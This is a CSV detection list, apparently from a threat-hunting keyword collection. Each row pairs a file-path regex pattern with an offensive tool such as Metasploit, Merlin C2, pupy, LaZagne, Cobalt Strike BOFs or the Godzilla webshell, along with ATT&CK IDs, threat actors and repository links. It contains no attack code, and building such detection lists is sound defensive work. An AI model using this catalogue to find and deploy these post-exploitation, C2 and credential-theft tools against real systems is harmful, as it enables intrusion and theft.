"*/membase-brute.nse*",".{0,1000}\/membase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8748"
"*/membase-http-info.nse*",".{0,1000}\/membase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8749"
"*/memcached-info.nse*",".{0,1000}\/memcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8750"
"*/memexec.pl*",".{0,1000}\/memexec\.pl.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","8751"
"*/memexec.py*",".{0,1000}\/memexec\.py.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","8752"
"*/memodipper64*",".{0,1000}\/memodipper64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8753"
"*/memory_exec.py*",".{0,1000}\/memory_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8754"
"*/memorydump.py*",".{0,1000}\/memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8755"
"*/mempodipper.c*",".{0,1000}\/mempodipper\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8756"
"*/MemReader_BoF/*",".{0,1000}\/MemReader_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","8757"
"*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","8758"
"*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8759"
"*/merlin.git*",".{0,1000}\/merlin\.git.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8760"
"*/merlin.html*",".{0,1000}\/merlin\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","0","1","N/A","high False positives rate","1","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8761"
"*/merlin.py*",".{0,1000}\/merlin\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","8762"
"*/merlin/agent_code/*",".{0,1000}\/merlin\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","8763"
"*/merlin/data/modules/*",".{0,1000}\/merlin\/data\/modules\/.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8764"
"*/merlinAgent-*.exe*",".{0,1000}\/merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8765"
"*/merlin-agent.git*",".{0,1000}\/merlin\-agent\.git.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8766"
"*/merlin-agent/tarball/v*",".{0,1000}\/merlin\-agent\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8767"
"*/merlin-agent/v2/cli*",".{0,1000}\/merlin\-agent\/v2\/cli.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8768"
"*/merlin-agent/v2/core*",".{0,1000}\/merlin\-agent\/v2\/core.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8769"
"*/merlin-agent/zipball/v*",".{0,1000}\/merlin\-agent\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8770"
"*/merlin-agent-dll.git*",".{0,1000}\/merlin\-agent\-dll\.git.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8771"
"*/merlin-agent-dll/*",".{0,1000}\/merlin\-agent\-dll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8772"
"*/merlinAgent-Linux-x64*",".{0,1000}\/merlinAgent\-Linux\-x64.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8773"
"*/met_inject.py*",".{0,1000}\/met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8780"
"*/Metasploit*",".{0,1000}\/Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8781"
"*/metasploit.go*",".{0,1000}\/metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8782"
"*/metasploit/*",".{0,1000}\/metasploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8783"
"*/metasploit_payloads.*",".{0,1000}\/metasploit_payloads\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8784"
"*/metasploit-coop:*",".{0,1000}\/metasploit\-coop\:.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","8785"
"*/MetasploitCoop_0x727.git*",".{0,1000}\/MetasploitCoop_0x727\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","8786"
"*/MetasploitCoop-Backend.git*",".{0,1000}\/MetasploitCoop\-Backend\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8787"
"*/MetasploitCoop-Frontend.git*",".{0,1000}\/MetasploitCoop\-Frontend\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Frontend","1","1","N/A","N/A","10","10","20","7","2024-04-03T14:49:19Z","2021-08-17T10:36:52Z","8788"
"*/metasploit-framework/*",".{0,1000}\/metasploit\-framework\/.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8789"
"*/metasploit-framework/embedded/framework*",".{0,1000}\/metasploit\-framework\/embedded\/framework.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","8790"
"*/metasploit-info.nse*",".{0,1000}\/metasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8791"
"*/metasploit-msgrpc-brute.nse*",".{0,1000}\/metasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8792"
"*/metasploit-omnibus*",".{0,1000}\/metasploit\-omnibus.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8793"
"*/metasploit-omnibus.git*",".{0,1000}\/metasploit\-omnibus\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8794"
"*/metasploit-omnibus.git*",".{0,1000}\/metasploit\-omnibus\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8795"
"*/metasploit-xmlrpc-brute.nse*",".{0,1000}\/metasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8796"
"*/metatwin.git*",".{0,1000}\/metatwin\.git.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","8797"
"*/meterpreter*",".{0,1000}\/meterpreter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8798"
"*/Meterpreter.classs*",".{0,1000}\/Meterpreter\.classs.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","8799"
